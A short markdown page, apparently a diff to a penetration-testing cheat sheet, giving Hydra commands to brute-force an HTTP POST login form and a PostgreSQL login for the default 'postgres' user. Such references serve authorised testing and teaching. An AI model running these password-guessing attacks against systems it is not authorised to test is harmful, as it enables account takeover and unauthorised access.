curtishoughton/Penetration-Testing-Cheat-Sheet/password-cracking/hydra.md

 To bruteforce a HTTP POST login form the following command can be used:

 `hydra -L /path/to/username-list.txt -P /path/to/password-wordlist.txt -t 1 http-post-form://<IP_ADDRESS> -m "/<loginPagePath>:UserNameParameter=^USER^&PasswordParameter=^PASS^&Login=<ID_of_login_button>:<message_if_login_fails>"`

+### PostGreSQL Database Login

+To bruteforce the login to a PostGreSQL database, you can use the following:

+`hydra -l postgres -P /path/to/password-wordlist.txt postgres://<IP_ADDRESS>`

+*Note this assumes you're trying to atttack the default user "postgres"*